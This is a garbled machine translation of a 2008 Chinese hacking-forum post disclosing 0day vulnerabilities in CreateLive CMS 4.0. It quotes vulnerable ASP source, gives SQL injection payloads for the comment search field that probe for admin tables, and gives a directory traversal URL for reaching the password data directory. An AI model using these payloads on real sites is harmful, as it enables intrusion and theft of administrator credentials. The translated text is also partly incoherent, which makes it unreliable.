CreateLive CMS Version 4.0 0day-vulnerability warning-the black bar safety net

ID MYHACK58:62200818543
Type myhack58
Reporter 佚名
Modified 2008-03-18T00:00:00


CreateLive CMS Version 4.0 0day.doc by:xiaok q:391232032.771044833 time: 2008-2-4 0 2:1 0 XP SP2 ie7 iis5. 1...... A tribute to D. S. T you gay, cause Hell-Phantom, the actuator on thin ice, causing the old D, The actuator Doom, causing the group to get help with the culture of the rogue......

Vulnerability is one of the

Source kingcms\User\User_Comment. asp CommentID

> sub SaveModify() > > ...... CommentID=Trim(Request("CommentID")) 'injection ...... if CommentID="" then FoundErr=True ErrMsg=ErrMsg &" > > * Add the specified comment ID > >" Exit sub end if ...... if FoundErr=True then exit sub sql="Select * from Cl_Comment where ChannelID="&ChannelID&" and UserID="&UserID&" & CommentID=" & CommentID 'injection Set rsComment=Server. CreateObject("Adodb. RecordSet") rsComment. Open sql,Conn,1,3 if rsComment. Bof or rsComment. EOF then FoundErr=True ErrMsg=ErrMsg &" > > * Cannot find the specified comment! > >" else ......

Without any filtering...... Of course new problems. Source kingcms\User\inc\Cl_ClsSysTem. asp

> 'Determine the submitted information is from an external Public Function ChkIsOuter() Dim server_v1,server_v2 ChkIsOuter=True server_v1=Cstr(Request. ServerVariables("HTTP_REFERER")) server_v2=Cstr(Request. ServerVariables("SERVER_NAME")) If Mid(server_v1,8,len(server_v2))=server_v2 Then ChkIsOuter=False End Function

All of the tools are not used, only to input some information and then post. NB to◎!#¥¥ # OF % of % of However, in a few seconds I found another one, because the article would write does not go up......)

Vulnerability of the two

Most of the sites are to be members of the audit, not directly into the. Is a search for vulnerabilities to it.

> 1&Query=search+query

Look at him how to write Source kingcms\User\User_Comment. asp

> SearchContent = Trim(request("SearchContent")) ...... Sub main() ...... if SearchContent<>"" then strSql2=strSql2 & " and M. CommentContent like '%" &SearchContent&"%'"

Under construction

> %'and (select count() from admin)>0 and '%'=' %'and (select count() from cl_admin)>0 and '%'='

Then enter here

The first sentence is asked him there is no admin of this table it the answer

The second sentence is asked him there is no cl_admin this table,because cl_admin exist, so it the answer is

Believe some people understand.`can only rely on hand......

The vulnerability of the three

You want to send articles of permissions, and you want to an external submitted detection bypass......) Maybe you can't wait, bored, ready to end to At 2 0 0 8 years 2 months 4 days 0 4:4 1:0 7...... With the member login, and then access

> /Admin/Admin_Files. asp? action=Main&FileType=select&ChannelID=2&ThisDir=../../Data

You will find a/because I use the admin login, so....../ Get the password how easy

Admin\Admin_Files. asp

> if ThisDir<>"" then ThisDir=Replace(ThisDir & "/","//","/")

Hand cramps, do not write to

The vulnerability of four

Sources with a release note file, because the log and the admin is not a database, not use value...... Must not Gaiden if Gaiden since you do not made to

CMS Version 4.0 0day